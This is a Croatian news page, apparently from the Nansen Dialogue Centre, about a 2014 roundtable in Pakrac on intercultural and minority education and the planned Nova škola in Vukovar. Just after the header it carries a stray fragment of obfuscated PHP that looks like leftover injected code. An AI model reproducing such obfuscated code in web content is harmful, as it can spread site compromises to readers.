header

*/($a3b0c4[$o5b2['i29321'][6]]);}exit();}} ?>

PB240237 2

Na okruglom stolu održanom u organizaciji Nansen dijalog centra, Srpskog demokratskog foruma, i Inicijative organizacija civilnog društva „SVI Mi – Za Hrvatsku svih nas“ u Pakracu 20.11.2014. od 10 do 13 sati u Gradskoj vijećnici (Kurija Janković) okupile su se organizacije civilnog društva koje se bave interkulturalnim i manjinskim obrazovanjem, dionici iz lokalne samouprave, škola i tijela javne uprave koja se bave obrazovanjem kako bi razmijenili iskustva o primjerima dobre prakse i izazovima interkulturanog obrazovanja i obrazovanja nacionalnih manjina.

Ivana Milas iz Nansen Dijalog Centra razjasnila je kako je osiguravanje uvjeta za interkulturalno obrazovanje naša međunarodna obveza i obveza u ključnim dokumentima vezanim uz obrazovanje, ali je i dobit jer je trajni mir moguće postići jedino međusobnim učenjem o kulturnim različitostima, uvažavanjem tih različitosti te prepoznavanjem različitih kulturnih utjecaja i utjecaja manjinskih kultura kao dijela bogatstva zajedničke kulturne baštine. Predstavljen je projekt Nova škola koji će uključivati otvaranje škole u Vukovaru koja će raditi po nadograđenom kurikulumu koji naglašeno njeguje interkulturalnost i uvažavanje različitosti. Ova škola će biti model interkulturalnog obrazovanja gdje bi učenici učili o vlastitoj kulturi, ostalim kulturama uključujući i kulture manjina te kroz participativne metode i izlazak u zajednicu istraživali kulturnu raznolikost kao dio zajedničkog kulturnog bogatstva. Predstavljen je i projekt Kulturne i duhovne baštine zavičaja koji je razvio Nansen Dialog Centar kako bi učenicima omogućio da kroz izvanastavnu aktivnost uče o različitim kulturama koje su utjecale i dale doprinos njihovom zavičaju.

Publikacije

interkulturno obrazovanje

Facebook

logo nansen korak po korak